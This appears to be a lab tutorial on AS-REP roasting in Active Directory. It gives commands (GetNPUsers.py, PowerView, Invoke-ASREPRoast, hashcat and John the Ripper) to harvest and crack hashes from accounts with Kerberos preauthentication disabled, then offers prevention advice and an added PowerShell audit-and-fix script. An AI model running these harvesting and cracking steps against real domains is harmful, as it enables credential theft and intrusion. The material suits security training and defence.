If a user’s UserAccountControl settings have the option “Do not require Kerberos preauthentication” enabled, it means that Kerberos preauthentication is disabled for that user. In simple terms, the KDC does not check that the requester knows the user’s password before issuing a Kerberos ticket, so anyone can request that user’s AS-REP, which is encrypted with a key derived from the user’s password, and brute-force it offline.
With sufficient rights over the account (GenericWrite or GenericAll), Kerberos preauth can also be forcibly disabled.
Lab Setup
The GetNPUsers.py script retrieves the AS-REP responses (the material needed to attack the Ticket Granting Ticket exchange) for users who have the “Do not require Kerberos preauthentication” property (UF_DONT_REQUIRE_PREAUTH) set, i.e. users for whom Kerberos pre-authentication is disabled.
python3 GetNPUsers.py crt.local/steve -dc-ip 192.168.1.109 -no-pass -req
Syntax: python3 GetNPUsers.py <domain>/<user> -dc-ip <domain controller IP> -no-pass -req
- -no-pass: if we do not have a password, this flag skips the password prompt
- -req: request the TGT for the user (this returns the crackable AS-REP hash)
In essence, the presence of the “Do not require Kerberos preauthentication” setting allows an attacker to obtain a hash derived from the user’s password, which can then be subjected to offline cracking using tools like hashcat or John the Ripper.
Cracking Hash
hashcat -m 18200 -a 0 'hash' rockyou.txt
We have successfully cracked the password.
Using Windows Host
#Using PowerView: Enumerating accounts with Kerberos Preauth disabled
Get-DomainUser -PreauthNotRequired -Verbose | select serviceprincipalname,samaccountname
#Using ActiveDirectory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
#Request encrypted AS-REP for offline brute-force. Let's use ASREPRoast
Get-ASREPHash -UserName VPN1user -Verbose
#To enumerate all users with Kerberos preauth disabled and request a hash
Invoke-ASREPRoast -Verbose
# We can use John the Ripper or Hashcat to brute-force the hashes offline
hashcat -m 18200 -a 0 hash rockyou.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worstpass.txt C:\AD\Tools\asrephashes.txt
Preventing AS-REP Roasting
AS-REP Roasting is the technique that retrieves crackable password material for users that have this flag set in Active Directory. Various cybersecurity and hacking tools, including Rubeus and Hashcat, can then crack the TGT material harvested from Active Directory.
⇒ An obvious way to prevent the AS-REP Roasting attack is to audit your Active Directory environment and ensure there are no accounts configured with “Do not require Kerberos preauthentication” enabled.
⇒ In addition to auditing your Active Directory settings for improperly configured preauthentication, make sure users are required to use strong, complex passwords, since the harvested material is only as weak as the password it was derived from.
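A small audit-and-remediate script for the first point above, added here as an example (it is not part of the original post). It assumes the ActiveDirectory module is available and that the operator has rights to modify userAccountControl on the affected accounts; the function names are my own.

```powershell
# Added example: find accounts with UF_DONT_REQUIRE_PREAUTH set and clear the flag.
# Assumes the ActiveDirectory module and write access to the accounts found.
Import-Module ActiveDirectory

# 0x400000 (4194304) is UF_DONT_REQUIRE_PREAUTH. 1.2.840.113556.1.4.803 is the
# LDAP bitwise-AND matching rule, so only accounts with that bit set match.
$PreauthDisabledFilter = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'

function Get-PreauthDisabledUser {
    # Report each affected account with the context an auditor needs:
    # is it enabled, when was it last used, how old is its password.
    Get-ADUser -LDAPFilter $PreauthDisabledFilter `
        -Properties userAccountControl, LastLogonDate, PasswordLastSet |
        Select-Object SamAccountName, Enabled, LastLogonDate, PasswordLastSet,
            @{ Name = 'UAC'; Expression = { '0x{0:X}' -f $_.userAccountControl } }
}

function Repair-PreauthDisabledUser {
    # Re-enable Kerberos preauthentication on every account found above.
    # Supports -WhatIf / -Confirm so the change can be rehearsed first.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    foreach ($u in Get-PreauthDisabledUser) {
        if ($PSCmdlet.ShouldProcess($u.SamAccountName, 'Clear DoesNotRequirePreAuth')) {
            Set-ADAccountControl -Identity $u.SamAccountName -DoesNotRequirePreAuth $false
        }
    }
}

# Report first, then rehearse the fix before applying it:
Get-PreauthDisabledUser | Format-Table -AutoSize
Repair-PreauthDisabledUser -WhatIf
```

Run `Repair-PreauthDisabledUser` without `-WhatIf` once the report has been reviewed; any account that genuinely needs the flag (a rare legacy case) should be excluded and given a long, random password instead.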